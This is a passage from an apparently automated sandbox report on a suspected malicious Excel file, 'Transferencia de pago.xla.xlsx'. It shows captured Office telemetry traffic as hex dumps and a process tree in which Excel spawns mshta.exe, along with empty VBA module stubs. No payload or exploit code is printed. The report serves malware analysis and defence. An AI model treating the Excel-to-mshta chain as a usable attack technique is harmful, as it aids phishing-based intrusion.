                  x-ms-version: 2018-03-28
                  x-azure-ref: 20250326T070338Z-17cccd5449bh49mhhC1EWRu7400000000g1g000000002umw
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L2_T2
                  X-Cache: TCP_REMOTE_HIT
                  Accept-Ranges: bytes
                  2025-03-26 07:03:38 UTC15884INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
                  Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
                  2025-03-26 07:03:38 UTC16384INData Raw: 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 56 20 56 3d 22 43 6c 69 63 6b 22 20 54 3d 22 57 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43
                  Data Ascii: S T="1" /> </T></R><$!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C
                  2025-03-26 07:03:38 UTC16384INData Raw: 20 20 20 3c 2f 41 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 67 6f 34 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 68 6c 76 79 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43
                  Data Ascii: </A> </C> <T> <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C
                  2025-03-26 07:03:38 UTC16384INData Raw: 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 45 22 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: "AND"> <L> <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE">
                  2025-03-26 07:03:38 UTC16384INData Raw: 54 3d 22 55 33 32 22 20 49 3d 22 32 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 34 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 4f 76 65 72 66 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20
                  Data Ascii: T="U32" I="22" O="false" N="FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C>
                  2025-03-26 07:03:38 UTC16384INData Raw: 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 45 74 77 20 54 3d 22 31 22 20 45 3d 22 33 39 35 22 20 47 3d 22 7b 32 61 64 66 38 65 32
                  Data Ascii: 1.0" encoding="utf-8"?><R Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e2
                  2025-03-26 07:03:38 UTC16384INData Raw: 3d 22 32 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 55 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20
                  Data Ascii: ="2" E="TelemetryShutdown" /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S>
                  2025-03-26 07:03:38 UTC16384INData Raw: 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 74 63 69 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <L> <S T="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R>
                  2025-03-26 07:03:38 UTC16384INData Raw: 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 31 30 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 4f 66 54 68 72 6f 77 6e 45 78 63 65 70
                  Data Ascii: </F> <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownExcep
                  2025-03-26 07:03:38 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c
                  Data Ascii: <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.74970213.107.246.404436712C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  TimestampBytes transferredDirectionData
                  2025-03-26 07:03:44 UTC214OUTGET /rules/rule120603v8s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                  Host: otelrules.svc.static.microsoft
                  2025-03-26 07:03:44 UTC494INHTTP/1.1 200 OK
                  Date: Wed, 26 Mar 2025 07:03:44 GMT
                  Content-Type: text/xml
                  Content-Length: 2128
                  Connection: close
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                  ETag: "0x8DC582BA41F3C62"
                  x-ms-request-id: 0fe88ecf-101e-007a-32da-9b047e000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20250326T070344Z-17cccd5449bq6f54hC1EWRb85w0000000g100000000036as
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2025-03-26 07:03:44 UTC2128INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.74970113.107.246.404436712C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  TimestampBytes transferredDirectionData
                  2025-03-26 07:03:44 UTC214OUTGET /rules/rule120607v1s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                  Host: otelrules.svc.static.microsoft
                  2025-03-26 07:03:44 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 26 Mar 2025 07:03:44 GMT
                  Content-Type: text/xml
                  Content-Length: 204
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                  ETag: "0x8DC582BB6C8527A"
                  x-ms-request-id: fe09a350-901e-0048-3adf-9cb800000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20250326T070344Z-17cccd5449bg7c4bhC1EWR84740000000fyg000000006d46
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2025-03-26 07:03:44 UTC204INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 37 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 45 52 3d 22 31 32 30 36 30 33 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 62 70 7a 73 22 20 41 3d 22 39 34 30 74 63 20 39 78 35 6a 73 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120607" V="1" DC="SM" T="Subrule" ER="120603" xmlns=""> <S> <UTS T="1" Id="bbpzs" A="940tc 9x5js" /> </S> <T> <S T="1" /> </T></R>


                  050100s020406080100

                  Click to jump to process

                  050100s0.0050100150200MB

                  Click to jump to process

                  • File
                  • Registry

                  Click to dive into process behavior distribution

                  Target ID:0
                  Start time:03:02:28
                  Start date:26/03/2025
                  Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                  Imagebase:0xb90000
                  File size:53'161'064 bytes
                  MD5 hash:4A871771235598812032C822E6F68F19
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                  Target ID:10
                  Start time:03:03:22
                  Start date:26/03/2025
                  Path:C:\Windows\SysWOW64\mshta.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
                  Imagebase:0x8e0000
                  File size:13'312 bytes
                  MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                  Target ID:12
                  Start time:03:03:31
                  Start date:26/03/2025
                  Path:C:\Windows\splwow64.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\splwow64.exe 12288
                  Imagebase:0x7ff64df60000
                  File size:163'840 bytes
                  MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                  Target ID:14
                  Start time:03:03:45
                  Start date:26/03/2025
                  Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Transferencia de pago.xla.xlsx"
                  Imagebase:0xb90000
                  File size:53'161'064 bytes
                  MD5 hash:4A871771235598812032C822E6F68F19
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                  Call Graph

                  Hide Legend
                  • Entrypoint
                  • Decryption Function
                  • Executed
                  • Not Executed
                  • Show Help
                  callgraph 1 Error: Graph is empty

                  Module: Sheet1

                  Declaration
                  LineContent
                  1

                  Attribute VB_Name = "Sheet1"

                  2

                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                  3

                  Attribute VB_GlobalNameSpace = False

                  4

                  Attribute VB_Creatable = False

                  5

                  Attribute VB_PredeclaredId = True

                  6

                  Attribute VB_Exposed = True

                  7

                  Attribute VB_TemplateDerived = False

                  8

                  Attribute VB_Customizable = True

                  Module: Sheet2

                  Declaration
                  LineContent
                  1

                  Attribute VB_Name = "Sheet2"

                  2

                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                  3

                  Attribute VB_GlobalNameSpace = False

                  4

                  Attribute VB_Creatable = False

                  5

                  Attribute VB_PredeclaredId = True

                  6

                  Attribute VB_Exposed = True

                  7

                  Attribute VB_TemplateDerived = False

                  8

                  Attribute VB_Customizable = True

                  Module: Sheet3

                  Declaration
                  LineContent
                  1

                  Attribute VB_Name = "Sheet3"

                  2

                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                  3

                  Attribute VB_GlobalNameSpace = False

                  4

                  Attribute VB_Creatable = False

                  5

                  Attribute VB_PredeclaredId = True

                  6

                  Attribute VB_Exposed = True

                  7

                  Attribute VB_TemplateDerived = False

                  8

                  Attribute VB_Customizable = True

                  Module: ThisWorkbook

                  Declaration
                  LineContent
                  1

                  Attribute VB_Name = "ThisWorkbook"

                  2

                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                  3

                  Attribute VB_GlobalNameSpace = False

                  4

                  Attribute VB_Creatable = False

                  5

                  Attribute VB_PredeclaredId = True

                  6

                  Attribute VB_Exposed = True

                  7

                  Attribute VB_TemplateDerived = False

                  8

                  Attribute VB_Customizable = True